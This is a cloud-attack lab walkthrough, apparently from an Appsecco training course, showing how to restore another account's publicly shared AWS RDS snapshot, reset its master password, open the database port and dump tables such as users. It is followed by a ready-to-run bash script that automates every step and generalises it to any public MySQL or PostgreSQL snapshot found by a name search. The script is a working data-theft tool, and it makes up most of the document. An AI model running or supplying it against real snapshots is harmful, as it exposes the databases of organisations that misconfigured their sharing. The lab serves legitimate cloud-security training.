AWS RDS Exploitation via Snapshots

arn:aws:rds:us-east-1:166440625841:snapshot:appsecco-rds-instance-6th-aug-2022

Introduction

AWS RDS allows users to create a storage volume snapshot of a DB instance, backing up the entire instance and not just individual databases. Snapshots are private by default, but on occasion users share them publicly to move them between accounts, instead of sharing them with a specific account ID. Any AWS account can restore a complete database instance from a public snapshot, so a misconfigured snapshot permission can expose the entire instance and the data within it. AWS does not allow encrypted snapshots to be shared publicly, so anything listed as public is unencrypted and can be restored without access to any key.

What are we going to cover?

In this chapter we shall see how to use the AWS CLI and the RDS API to restore a public RDS snapshot as a new instance in our own account, reset its master credentials and then gain access to the data it contains.

Steps to attack

Stealing from RDS Snapshots

Using the console, navigate to AWS RDS > Snapshots > Public. You can also navigate to this URL to see all public RDS snapshots for the us-east-1 region - https://us-east-1.console.aws.amazon.com/rds/home?region=us-east-1#snapshots-list:tab=public


You can search for any Appsecco snapshots by using the filter textbox.


Once the snapshot is found, let's restore it as a new instance.

Before restoring, make sure your AWS account has a default VPC: RDS needs a VPC and DB subnet group to place the instance in. If there is none, run the command below to create one

aws ec2 create-default-vpc

Run the command below to restore the snapshot as a new instance. Because the snapshot belongs to another account it has to be referenced by its full ARN, and --publicly-accessible gives the instance a public IP so it can be reached from outside the VPC

aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:166440625841:snapshot:appsecco-rds-instance-6th-aug-2022 --availability-zone us-east-1b

Once the restore has been started, we check whether the instance has been created so that we can connect to it

aws rds describe-db-instances --db-instance-identifier recoverdb

You may have to wait some time: a restored instance passes through the "creating" and "backing-up" states before it is usable. The "DBInstanceStatus" field in the describe-db-instances output should read "available". The same output also reports the "MasterUsername" inherited from the snapshot, which is the login we will use later.

Finally, we reset the master user's password (we do not know the original one, but we own the restored instance, so we may change it) and log in to the instance

aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately

This operation also takes some time: the status changes to "resetting-master-credentials" and then back to "available". You can check it by running the aws rds describe-db-instances command covered above

Run the following command from the cloudhacker machine to check that the MySQL port on the restored RDS instance is reachable. Replace <rds-endpoint> with the "Endpoint"."Address" value from the describe-db-instances output.

nc <rds-endpoint> 3306 -zvv

If the port is not reachable, TCP 3306 has to be opened on the instance's security group. An instance restored into the default VPC gets the default security group, which only allows traffic from other members of the same group, so inbound access from the attacker machine must be added explicitly.

  • In RDS console, click on the recoverdb instance

  • Click on the Security Group

  • Add an inbound rule for TCP port 3306 from the Cloudhacker IP only (a /32, not 0.0.0.0/0, so nobody else can reach the restored data)

Connect to the endpoint using the mysql client, with the MasterUsername reported by describe-db-instances as the username and the password set above when prompted

mysql -u <username> -p -h <rds-instance-endpoint>

Once you are connected using the mysql client, you can pilfer the data, for example

show databases;
use userdb;
show tables;
select * from users;
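As an added example (not part of the original lab page and not Appsecco's code), the bash script below strings the whole procedure above together with the AWS CLI v2: it lists public snapshots whose name contains a search string (the CLI equivalent of the console's Public tab), makes sure a default VPC exists, restores the snapshot by ARN, waits for it to become available, resets the master password, opens the database port on the instance's security group to the caller's IP only, checks reachability with nc and connects. It goes beyond the page in one respect: the port and client are chosen from the restored instance's engine, so it also handles PostgreSQL-family public snapshots. The environment variables REGION, INSTANCE_ID, SNAPSHOT_ARN, NEW_PASSWORD and SEARCH, the helper functions (is_set, port_for_engine, client_for_engine, describe and the rest), and the use of https://checkip.amazonaws.com to learn the caller's public IP are all this example's own assumptions.

```bash
#!/usr/bin/env bash
# Added example (not from the original lab): the restore-and-pillage procedure
# automated with the AWS CLI v2. Assumes credentials for an account you control,
# a MySQL- or PostgreSQL-family snapshot, and nc plus mysql/psql on the attacker
# host. Nothing below talks to AWS until the script is invoked with "run".
set -eu

REGION="${REGION:-us-east-1}"
INSTANCE_ID="${INSTANCE_ID:-recoverdb}"
SNAPSHOT_ARN="${SNAPSHOT_ARN:-arn:aws:rds:us-east-1:166440625841:snapshot:appsecco-rds-instance-6th-aug-2022}"
NEW_PASSWORD="${NEW_PASSWORD:-NewPassword1}"   # lab value; use a random one outside the lab
SEARCH="${SEARCH:-appsecco}"                   # substring to look for in public snapshot names

# "--output text" prints the literal string None for a null field, so an
# emptiness check alone is not enough when testing a query result.
is_set() { [ -n "${1:-}" ] && [ "$1" != "None" ] && [ "$1" != "null" ]; }

# Default port and client per engine; the lab uses MySQL on 3306.
port_for_engine() {
  case "$1" in
    mysql|mariadb|aurora|aurora-mysql) echo 3306 ;;
    postgres|aurora-postgresql)        echo 5432 ;;
    *) echo "unsupported engine: $1" >&2; return 1 ;;
  esac
}
client_for_engine() {
  case "$1" in
    mysql|mariadb|aurora|aurora-mysql) echo mysql ;;
    postgres|aurora-postgresql)        echo psql ;;
    *) echo "unsupported engine: $1" >&2; return 1 ;;
  esac
}

rds() { aws --region "$REGION" rds "$@"; }
ec2() { aws --region "$REGION" ec2 "$@"; }
# Read one field of the restored instance, e.g. describe Endpoint.Address
describe() {
  rds describe-db-instances --db-instance-identifier "$INSTANCE_ID" \
    --query "DBInstances[0].$1" --output text
}

# Step 1: enumerate public snapshots; Encrypted is always false for these.
list_public_snapshots() {
  rds describe-db-snapshots --snapshot-type public \
    --query "DBSnapshots[?contains(DBSnapshotIdentifier, '$SEARCH')].[DBSnapshotIdentifier,Engine,Encrypted,SnapshotCreateTime]" \
    --output table
}

# Step 2: the restore needs a default VPC (and its DB subnet group).
ensure_default_vpc() {
  local vpc
  vpc=$(ec2 describe-vpcs --filters Name=isDefault,Values=true --query 'Vpcs[0].VpcId' --output text)
  is_set "$vpc" || ec2 create-default-vpc >/dev/null
}

# Step 3: restore by ARN (mandatory for another account's snapshot) and wait.
restore_snapshot() {
  rds restore-db-instance-from-db-snapshot --db-instance-identifier "$INSTANCE_ID" \
    --db-snapshot-identifier "$SNAPSHOT_ARN" --publicly-accessible \
    --availability-zone "${REGION}b" >/dev/null      # matches the lab's us-east-1b
  rds wait db-instance-available --db-instance-identifier "$INSTANCE_ID"
}

# Step 4: we own the restored copy, so we can set the master password.
reset_master_password() {
  rds modify-db-instance --db-instance-identifier "$INSTANCE_ID" \
    --master-user-password "$NEW_PASSWORD" --apply-immediately >/dev/null
  # The status only flips to resetting-master-credentials after a moment; waiting
  # immediately would return while the instance still reads "available".
  sleep 30
  rds wait db-instance-available --db-instance-identifier "$INSTANCE_ID"
}

# Step 5: allow only our own IP to the DB port on the instance's security group.
open_db_port() {
  local port="$1" sg my_ip
  sg=$(describe 'VpcSecurityGroups[0].VpcSecurityGroupId')
  my_ip=$(curl -s https://checkip.amazonaws.com)
  # A second run hits InvalidPermission.Duplicate once the rule exists; ignore it.
  ec2 authorize-security-group-ingress --group-id "$sg" --protocol tcp \
    --port "$port" --cidr "${my_ip}/32" >/dev/null 2>&1 || true
}

main() {
  list_public_snapshots
  ensure_default_vpc
  restore_snapshot
  reset_master_password
  local engine port host user
  engine=$(describe Engine); port=$(port_for_engine "$engine")
  host=$(describe Endpoint.Address); user=$(describe MasterUsername)
  open_db_port "$port"
  nc -zvv -w 5 "$host" "$port"
  case "$(client_for_engine "$engine")" in
    mysql) MYSQL_PWD="$NEW_PASSWORD" mysql -u "$user" -h "$host" -P "$port" -e 'show databases;' ;;
    psql)  PGPASSWORD="$NEW_PASSWORD" psql -U "$user" -h "$host" -p "$port" -d postgres -c '\l' ;;
  esac
}

case "${1:-}" in run) main ;; esac
```

Run it as `bash restore_public_rds.sh run`; without the argument it only defines the functions. The restored instance bills by the hour and holds a copy of someone else's data, so remove it when finished with aws rds delete-db-instance --db-instance-identifier recoverdb --skip-final-snapshot.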
